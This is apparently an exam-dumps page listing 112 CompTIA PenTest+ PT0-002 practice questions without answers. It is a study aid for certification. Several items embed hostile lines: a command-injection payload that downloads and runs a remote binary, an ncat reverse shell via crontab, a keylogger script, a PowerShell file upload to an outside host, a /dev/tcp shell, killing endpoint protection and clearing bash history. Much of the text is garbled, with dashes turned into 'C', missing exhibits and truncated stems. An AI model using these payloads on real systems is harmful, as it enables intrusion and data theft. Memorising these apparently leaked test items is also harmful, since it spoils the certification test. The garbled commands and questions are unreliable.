Online PT0-002 Dumps Help You Understand Questions Well

Category:

Comments:

0 Comments

Post Date:

April 17, 2023

If you're interested in pursuing the PenTest+ certification, it's important to understand the exam format and the types of questions you can expect. This is where PT0-002 questions come in. PT0-002 exam dumps questions are designed to simulate the actual certification exam, providing you with a deeper understanding of the exam format and what to expect on test day. By taking practice exams and reviewing PT0-002 questions, you can identify areas where you may need to focus your studying. Study free PT0-002 exam dumps below.

Page 1 of 13

1. A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists.

Which of the following should be the FIRST step to plan the reconnaissance activities?

Launch an external scan of netblocks.

Check WHOIS and netblock records for the company.

Use DNS lookups and dig to determine the external hosts.

Conduct a ping sweep of the company's netblocks.

2. During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php', data={'cmd=id'}))"

python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php', data= ('cmd':'id') ) .text) "

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php', params= {'cmd':'id'}) )"

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php', params= ('cmd':'id'}) .text) "

3. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

grep Cv apache ~/.bash_history > ~/.bash_history

rm Crf /tmp/apache

chmod 600 /tmp/apache

taskkill /IM “apache” /F

4. Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

DirBuster

CeWL

w3af

Patator

5. A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet.

Which of the following is the BEST action for the tester to take?

Check the scoping document to determine if exfiltration is within scope.

Stop the penetration test.

Escalate the issue.

Include the discovery and interaction in the daily report.

6. A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop.

Which of the following can be used to ensure the tester is able to maintain access to the system?

schtasks /create /sc /ONSTART /tr C:TempWindowsUpdate.exe

wmic startup get caption,command

crontab Cl; echo “@reboot sleep 200 && ncat Clvp 4242 Ce /bin/bash”) | crontab 2>/dev/null

sudo useradd Cou 0 Cg 0 user

7. During an assessment, a penetration tester emailed the following Python script to CompTIA's employees:

import pyHook, sys, logging, pythoncom, datetime

log_file='C:\Windows\Temp\log_comptia.txt' def KbrdEvent(event):

logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii)

logging.log (10, chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = KbrdEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

Which of the following is the intended effect of this script?

Debugging an exploit

Keylogging

Collecting logs

Scheduling tasks

8. Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

After detection of a breach

After a merger or an acquisition

When an organization updates its network firewall configurations

When most of the vulnerabilities have been remediated

9. A consulting company is completing the ROE during scoping.

Which of the following should be included in the ROE?

Cost ofthe assessment

Report distribution

Testing restrictions

Liability

10. A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester.

Which of the following would be the most appropriate NEXT step?

Terminate the contract.

Update the ROE with new signatures. Most Voted

Scan the 8-bit block to map additional missed hosts.

Continue the assessment.

Page 2 of 13

11. A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

Understanding the tactics of a security intrusion can help disrupt them.

Scripts that are part of the framework can be imported directly into SIEM tools.

The methodology can be used to estimate the cost of an incident better.

The framework is static and ensures stability of a security program overtime.

12. A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

Stronger algorithmic requirements

Access controls on the server

Encryption on the user passwords

A patch management program

13. Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

OWASP Top 10

MITRE ATT&CK

Cyber Kill Chain

Well-Architected Framework

14. A compliance-based penetration test is primarily concerned with:

obtaining Pll from the protected network.

bypassing protection on edge devices.

determining the efficacy of a specific set of security standards.

obtaining specific information from the protected network.

15. The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a “probable port scan” alert in the organization’s IDS?

Line 01

Line 02

Line 07

Line 08

16. Which of the following tools would be best suited to perform a cloud security assessment?

OpenVAS

Scout Suite

Nmap

ZAP

Nessus

17. A penetration tester wants to find hidden information in documents available on the web at a particular domain.

Which of the following should the penetration tester use?

Netcraft

CentralOps

Responder

FOCA

18. A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data.

Which of the following should the tester do with this information to make this a successful exploit?

Perform XS

Conduct a watering-hole attack.

Use BeE

Use browser autopwn.

19. A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server's name.

Which of the following is the best way for a penetration tester to exploit this situation?

Relay the traffic to the real file server and steal documents as they pass through.

Host a malicious file to compromise the workstation.

Reply to the broadcasts with a fake IP address to deny access to the real file server.

Respond to the requests with the tester's IP address and steal authentication credentials.

20. A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment.

Which of the following would be the BEST option to identify a system properly prior to performing the assessment?

Asset inventory

DNS records

Web-application scan

Full scan

Page 3 of 13

21. A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.

Which of the following are considered passive reconnaissance tools? (Choose two.)

Wireshark

Nessus

Retina

Burp Suite

Shodan

Nikto

22. A penetration tester is looking for a particular type of service and obtains the output below:

I Target is synchronized with 127.127.38.0 (reference clock)

I Alternative Target Interfaces:

I 10.17.4.20

I Private Servers (0)

I Public Servers (0)

I Private Peers (0)

I Public Peers (0)

I Private Clients (2)

I 10.20.8.69 169.254.138.63

I Public Clients (597)

I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152

I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118

I 68.56.205.98

I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2

I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682

I Other Associations (1)

|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7

Which of the following commands was executed by the tester?

nmap-sU-pU:517-Pn-n ―script=supermicro-ipmi-config

nmap-sU-pU:123-Pn-n ―script=ntp-monlist

nmap-sU-pU:161-Pn-n ―script«voldemort-info

nmap-sU-pU:37-Pn-n―script=icap-info

23. During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application.

Which of the following vulnerabilities has the penetration tester exploited?

Command injection

Broken authentication

Direct object reference

Cross-site scripting

24. During a penetration test of a server application, a security consultant found that the application randomly crashed or remained stable after opening several simultaneous connections to the application and always submitting the same packets of data.

Which of the following is the best sequence of steps the tester should use to understand and exploit the vulnerability?

Attach a remote profiler to the server application. Establish a random number of connections to the server application. Send fixed packets of data simultaneously using those connections.

Attach a remote debugger to the server application. Establish a large number of connections to the server application. Send fixed packets of data simultaneously using those connections.

Attach a local disassembler to the server application. Establish a single connection to the server application. Send fixed packets of data simultaneously using that connection.

Attach a remote disassembler to the server application. Establish a small number of connections to the server application. Send fixed packets of data simultaneously using those connections.

25. During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000.

Which of the following Python scripts would achieve this task?

for i in range(1000, 2001): s = socket(AF_INET, SOCK_STREAM) conn = s.connect_ex((host_IP, i)) if (conn == 0): print(fPort {i} OPEN’) s.close ()

for i in range(1001, 2000): s = socket(AF_INET, SOCK_STREAM) conn = s.connect_ex((host_IP, i)) if (conn == 0): print (f'Port {i} OPEN’) s.close ()

for i in range(1000, 2001): s = socket(AF―INET, SOCK_DGRAM) conn = s.connect― ex((host_IP, i)) if (conn == 0): print(f’Port {i} OPEN’) s.close ()

for i in range (1000, 2000): s = socket(SOCK_STREAM, AF_INET) conn = s.connect― ex((host―IP, i)) if (conn == 0): print (f'Port {i} OPEN') s.close()

26. A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment.

Which of the following BEST describes the action taking place?

Maximizing the likelihood of finding vulnerabilities

Reprioritizing the goals/objectives

Eliminating the potential for false positives

Reducing the risk to the client environment

27. A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer.

Which of the following MOST likely explains the penetration tester's decision?

The tester had the situational awareness to stop the transfer.

The tester found evidence of prior compromise within the data set.

The tester completed the assigned part of the assessment workflow.

The tester reached the end of the assessment time frame.

28. A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped.

Which of the following would be the BEST recommendation to prevent this type of activity in the future?

Enforce mandatory employee vacations

Implement multifactor authentication

Install video surveillance equipment in the office

Encrypt passwords for bank account information

29. When accessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:

..d index: eid in /apache/www/validate/user.php line 12

..d index: uid in /apache/www/validate/user.php line 13

..d index: pw in /apache/www/validate/user.php line 14

..d index: acl in /apache/www/validate/user.php line 15

Lack of code signing

Incorrect command syntax

Insufficient error handling

Insecure data transmission

30. Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

Analyze the malware to see what it does.

Collect the proper evidence and then remove the malware.

Do a root-cause analysis to find out how the malware got in.

Remove the malware immediately.

Stop the assessment and inform the emergency contact.

Page 4 of 13

31. During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

NDA

32. A penetration tester would like to crack a hash using a list of hashes and a predefined set of rules. The tester runs the following command: hashcat.exe -a 0 .hash.txt .rockyou.txt -r .rulesreplace.rule

Which of the following is the penetration tester using to crack the hash?

Hybrid attack

Dictionary

Rainbow table

Brute-force method

33. A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service.

Which of the following is the most appropriate next step?

Contact the high-profile celebrities.

Delete the high-profile accounts.

Immediately contact the client.

Record the findings in the penetration test report.

34. A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

Decode the authorization header using UTF-8.

Decrypt the authorization header using bcrypt.

Decode the authorization header using Base64.

Decrypt the authorization header using AE

35. A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR."

Which of the following attacks is being attempted?

SQL injection

HTML injection

Remote command injection

DLL injection

36. During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128

Reply from 192.168.1.23: bytes=32 time<53ms TTL=128

Reply from 192.168.1.23: bytes=32 time<60ms TTL=128

Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

Linux

NetBSD

Windows

macOS

37. A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM.

Which of the following cloud attacks did the penetration tester MOST likely implement?

Direct-to-origin

Cross-site scripting

Malware injection

Credential harvesting

38. Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking: The models of equipment purchased are vulnerable to attack.

Which of the following is the most likely next step for the penetration?

Alert the target company of the discovered information.

Verify the discovered information is correct with the manufacturer.

Scan the equipment and verify the findings.

Return to the dumpster for more information.

39. Which of the following would be the most efficient way to write a Python script that interacts with a web application?

Create a class for requests.

Write a function for requests.

Import the requests library.

Use the cURL OS command.

40. Which of the following best explains why communication is a vital phase of a penetration test?

To discuss situational awareness

To build rapport with the emergency contact

To explain the data destruction process

To ensure the likelihood of future assessments

Page 5 of 13

41. Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email.

Which of the following commands would best help the tester determine which cloud email provider

the log-in page needs to mimic?

dig company.com MX

whois company.com

cur1 www.company.com

dig company.com A

42. A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines.

Which of the following documents could hold the penetration tester accountable for this action?

ROE

SLA

MSA

NDA

43. A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high.

Which of the following should be the NEXT step?

Perform a new penetration test.

Remediate the findings.

Provide the list of common vulnerabilities and exposures.

Broaden the scope of the penetration test.

44. A penetration tester wrote the following script on a compromised system:

#!/bin/bash

network='10.100.100'

ports='22 23 80 443'

for x in {1 .. 254};

do (nc -zv $network.$x $ports );

done

Which of the following would explain using this script instead of another tool?

The typical tools could not be used against Windows systems.

The configuration required the penetration tester to not utilize additional files.

The Bash script will provide more thorough output.

The penetration tester wanted to persist this script to run on reboot.

45. A penetration tester is performing an assessment for an organization and must gather valid user credentials.

Which of the following attacks would be best for the tester to use to achieve this objective?

Wardriving

Captive portal

Deauthentication

Impersonation

46. CORRECT TEXT

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

47. Which of the following factors would a penetration tester most likely consider when testing at a location?

Determine if visas are required.

Ensure all testers can access all sites.

Verify the tools being used are legal for use at all sites.

Establish the time of the day when a test can occur.

48. A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the...

Which of the following techniques is the penetration tester using?

Password brute force attack

SQL injection

Password spraying

Kerberoasting

49. A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom.

Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

Shoulder surfing

Call spoofing

Badge stealing

Tailgating

Dumpster diving

Email phishing

50. A penetration tester runs a reconnaissance script and would like the output in a standardized machine-readable format in order to pass the data to another application.

Which of the following is the best for the tester to use?

JSON

Lists

XLS

Trees

Page 6 of 13

51. Which of th e following expressions in Python increase a variable val by one (Choose two.)

val++

+val

val=(val+1)

++val

val=val++

val+=1

52. Which of the following is the most secure method for sending the penetration test report to the client?

Sending the penetration test report on an online storage system.

Sending the penetration test report inside a password-protected ZIP file.

Sending the penetration test report via webmail using an HTTPS connection.

Encrypting the penetration test report with the client’s public key and sending it via email.

53. Which of the following documents would be the most helpful in determining who is at fault for a temporary outage that occurred during a penetration test?

Non-disclosure agreement

Business associate agreement

Assessment scope and methodologies

Executive summary

54. A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

55. An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying.

Which of the following attacks is the executive most likely experiencing?

Data modification

Amplification

Captive portal

Evil twin

56. A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine.

Which of the following MOST likely caused the attack to fail?

The injection was too slow.

The DNS information was incorrect.

The DNS cache was not refreshed.

The client did not receive a trusted response.

57. Which of the following members of a client organization are most likely authorized to provide a signed authorization letter prior to the start date of a penetration test?

The IT department

The executive management team and legal personnel

Organizational security personnel

The human resources team

58. A penetration tester wrote the following Bash script to brute force a local service password:

..ting as expected.

Which of the following changes should the penetration tester make to get the script to work?

..e cho "The correct password is $p" && break) ho "The correct password is $p" I| break

.e cho "The correct password is $p" && break) o "The correct password is $p" I break

e cho "The correct password is Sp" && break) echo "The correct password is $p" && break)

. { echo "The correct password is $p" && break ) With I| ( echo "The correct password is $p" && break )

59. Penetration tester has discovered an unknown Linux 64-bit executable binary.

Which of the following tools would be BEST to use to analyze this issue?

Peach

WinDbg

GDB

OllyDbg

60. A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible.

Which of the following remediation techniques would be the BEST to recommend? (Choose two.)

Closing open services

Encryption users' passwords

Randomizing users' credentials

Users' input validation

Parameterized queries

Output encoding

Page 7 of 13

61. A company recruited a penetration tester to configure wireless IDS over the network.

Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

Aircrack-ng

Wireshark

Wifite

Kismet

62. A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

Which of the following commands would help the tester START this process?

certutil Curlcache Csplit Cf http://192.168.2.124/windows-binaries/ accesschk64.exe

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

schtasks /query /fo LIST /v | find /I “Next Run Time:”

wget http://192.168.2.124/windows-binaries/accesschk64.exe CO accesschk64.exe

63. A pe netration tester wants to perform reconnaissance without being detected.

Which of the following activities have a MINIMAL chance of d etection? (Choose two.)

Open-source research

A ping sweep

Traffic sniffing

Port knocking

A vulnerability scan

An Nmap scan

64. A penetration tester who is working remotely is conducting a penetration test using a wireless connection.

Which of the following is the BEST way to provide confidentiality for the client while using this connection?

Configure wireless access to use a AAA server.

Use random MAC addresses on the penetration testing distribution.

Install a host-based firewall on the penetration testing distribution.

Connect to the penetration testing company's VPS using a VP

65. Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers.

Which of the following would best mitigate this issue?

Implementation of patching and change control programs

Revision of client scripts used to perform system updates

Remedial training for the client's systems administrators

Refrainment from patching systems until quality assurance approves

66. During a security assessment, a penetration tester decides to write the following Python script:

import requests

x= ['OPTIONS', 'TRACE', 'TEST'l

for y in x;

z - requests.request(y, 'http://server.net')

print(y, z.status_code, z.reason)

Which of the following is the penetration tester trying to accomplish? (Select two).

Web server denial of service

HTTP methods availability

'Web application firewall detection

'Web server fingerprinting

Web server error handling

Web server banner grabbing

67. Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

Nessus

Metasploit

Burp Suite

Ethercap

68. Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

MSA

NDA

SOW

ROE

69. An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago.

Which of the following post-report delivery activities would have most likely prevented this scenario?

Client acceptance

Data destruction process

Attestation of findings

Lessons learned

70. A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building.

Which of the following techniques would be BEST to use to gain confidential information?

Badge cloning

Dumpster diving

Tailgating

Shoulder surfing

Page 8 of 13

71. Which of the following BEST describe the OWASP Top 10? (Choose two.)

The most critical risks of web applications

A list of all the risks of web applications

The risks defined in order of importance

A web-application security standard

A risk-governance and compliance framework

A checklist of Apache vulnerabilities

72. A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.

Which of the following BEST describes what happened?

The penetration tester was testing the wrong assets

The planning process failed to ensure all teams were notified

The client was not ready for the assessment to start

The penetration tester had incorrect contact information

73. Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

Unsupported operating systems

Susceptibility to DDoS attacks

Inability to network

The existence of default passwords

74. Which of the following is a rules engine for managing public cloud accounts and resources?

Cloud Custodian

Cloud Brute

Pacu

Scout Suite

75. A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

Familiarity and likeness

Authority and urgency

Scarcity and fear

Social proof and greed

76. A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Telnet

HTTP

SMTP

DNS

NTP

SNMP

77. A penetration tester ran the following command on a staging server:

python Cm SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

nc 10.10.51.50 9891 < exploit

powershell Cexec bypass Cf \10.10.51.509891

bash Ci >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

wget 10.10.51.50:9891/exploit

78. An Nmap network scan has found five open ports with identified services.

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

OpenVAS

Drozer

Burp Suite

OWASP ZAP

79. Appending string values onto another string is called:

compilation

connection

concatenation

conjunction

80. During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign.

Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

Scraping social media sites

Using the WHOIS lookup tool

Crawling the client’s website

Phishing company employees

Utilizing DNS lookup tools

Conducting wardriving near the client facility

Page 9 of 13

81. 1.The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A birthday attack on 64-bit ciphers (Sweet32)

An attack that breaks RC4 encryption

An attack on a session ticket extension (Ticketbleed)

A Heartbleed attack

82. Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

Shodan

Nmap

WebScarab-NG

Nessus

83. A penetr ation tester who is doing a security assessment discov ers that a critical vulnerability is being actively exploited by cybercriminals.

Which of the following should the tester do NEXT?

Reach out to the primary point of contact

Try to take down the attackers

Call law enforcement officials immediately

Collect the proper evidence and add to the final report

84. A client evaluating a penetration testing company requests examples of its work.

Which of the following represents the BEST course of action for the penetration testers?

Redact identifying information and provide a previous customer's documentation.

Allow the client to only view the information while in secure spaces.

Determine which reports are no longer under a period of confidentiality.

Provide raw output from penetration testing tools.

85. During a security assessment of a web application, a penetration tester was able to generate the following application response:

Unclosed quotation mark after the character string Incorrect syntax near ".

Which of the following is the most probable finding?

SQL injection

Cross-site scripting

Business logic flaw

Race condition

86. A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras.

Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

Pick a lock.

Disable the cameras remotely.

Impersonate a package delivery worker.

Send a phishing email.

87. A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building.

Which of the following attacks did the penetration tester perform?

Dumpster diving

Phishing

Badge cloning

Tailgating

88. A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.

Which of the following commands should be used to accomplish the goal?

VRFY and EXPN

VRFY and TURN

EXPN and TURN

RCPT TO and VRFY

89. A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement.

Which of the following is the BEST option for the tester to take?

Segment the firewall from the cloud.

Scan the firewall for vulnerabilities.

Notify the client about the firewall.

Apply patches to the firewall.

90. A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company’s privacy policy.

Which of th e following would be the BEST to use to find vul nerabilities on this server?

OpenVAS

Nikto

SQLmap

Nessus

Page 10 of 13

91. Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

A. The libraries may be vulnerable

B. The licensing of software is ambiguous

C. The libraries’ code bases could be read by anyone

D. The provenance of code is unknown

E. The libraries may be unsupported

F. The libraries may break the application

92. A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network.

Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?

nmap ―script=s7-info -p 102 10.88.88.76/24 -T3

nmap ―script=wsdd-discover -p 3702 -sUl

88.88.76/24

nmap --script=iax2-version -p 4569 -sU -V 10.88.88.76/24 -T2

nmap --script=xll-access -p 6000-6009 10.88.88.76/24

93. A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.

Which of the following is the MOST important action to take before starting this type of assessment?

Ensure the client has signed the SO

Verify the client has granted network access to the hot site.

Determine if the failover environment relies on resources not owned by the client.

Establish communication and escalation procedures with the client.

94. A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.

Which of the following was captured by the testing team?

Multiple handshakes

IP addresses

Encrypted file transfers

User hashes sent over SMB

95. A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

Run an application vulnerability scan and then identify the TCP ports used by the application.

Run the application attached to a debugger and then review the application's log.

Disassemble the binary code and then identify the break points.

Start a packet capture with Wireshark and then run the application.

96. In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: .

Which of the following would be the best action for the tester to take NEXT with this information?

Create a custom password dictionary as preparation for password spray testing.

Recommend using a password manage/vault instead of text files to store passwords securely.

Recommend configuring password complexity rules in all the systems and applications.

Document the unprotected file repository as a finding in the penetration-testing report.

97. A penetration tester is performing DNS reconnaissance and has obtained the following output using different dig comrr

;; ANSWER SECTION

company.com. 5 IN MX 10 mxa.company.com

company.com. 5 IN- MX 10 mxb.company.com

company.com. 5 IN MX 100 mxc.company.com

;; ANSWER SECTION company.com. 5 IN A 120.73.220.53

;; ANSWER SECTION company.com. 5 IN NS nsl.nsvr.com

Which of the following can be concluded from the output the penetration tester obtained?

mxc.company.com is the preferred mail server.

The company.com record can be cached for five minutes.

The company's website is hosted at 120.73.220.53.

The nameservers are not redundant.

98. An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

Encrypted passwords

System-hardening techniques

Multifactor authentication

Network segmentation

99. After successfully compromising a remote host, a security consultant notices an endpoint protection software is running on the host.

Which of the following commands would be best for the consultant to use to terminate the protection software and its child processes?

taskkill /PID /T /F

taskkill /PID /IM /F

taskkill /PID /S /U

taskkill /PID /F /P

100. A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host.

Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

tcpdump

Snort

Nmap

Netstat

Fuzzer

Page 11 of 13

101. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

Windows

Apple

Linux

Android

102. A security analyst needs to perform a scan for SMB port 445 over a/16 network.

Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

Nmap -s 445 -Pn -T5 172.21.0.0/16

Nmap -p 445 -n -T4 -open 172.21.0.0/16

Nmap -sV --script=smb* 172.21.0.0/16

Nmap -p 445 -max -sT 172. 21.0.0/16

103. A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch Cr .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

Redirecting Bash history to /dev/null

Making a copy of the user's Bash history for further enumeration

Covering tracks by clearing the Bash history

Making decoy files on the system to confuse incident responders

104. Which of the following is the most important to include in the scope of a wireless security assessment?

A. Frequencies

B. APs

C. SSIDs

D. Signal strengths

105. For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling.

Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

window.location.= 'https://evilcorp.com'

crossDomain: true

geturlparameter ('username')

redirectUrl = 'https://example.com'

106. A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good.

Which of the following recommendations should the penetration tester include in the report?

Add a dependency checker into the tool chain.

Perform routine static and dynamic analysis of committed code.

Validate API security settings before deployment.

Perform fuzz testing of compiled binaries.

107. PCI DSS requires which of the following as part of the penetration-testing process?

The penetration tester must have cybersecurity certifications.

The network must be segmented.

Only externally facing systems should be tested.

The assessment must be performed during non-working hours.

108. A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal.

Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Edit the discovered file with one line of code for remote callback

Download .pl files and look for usernames and passwords

Edit the smb.conf file and upload it to the server

Download the smb.conf file and look at configurations

109. Which of the following tools provides Python classes for interacting with network protocols?

Responder

Impacket

Empire

PowerSploit

110. A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache.

The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

tcpdump -i eth01 arp and arp[6:2] == 2

arp -s 192.168.1.63 60-36-DD-A6-C5-33

ipconfig /all findstr /v 00-00-00 | findstr Physical

route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

Page 12 of 13

111. A penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

Default web configurations

Open web ports on a host

Supported HTTP methods

Listening web servers in a domain

112. Given the following user-supplied data:

www.comptia.com/info.php?id=1 AND 1=1

Which of the following attack techniques is the penetration tester likely implementing?

Boolean-based SQL injection

Time-based SQL injection

Stored cross-site scripting

Reflected cross-site scripting

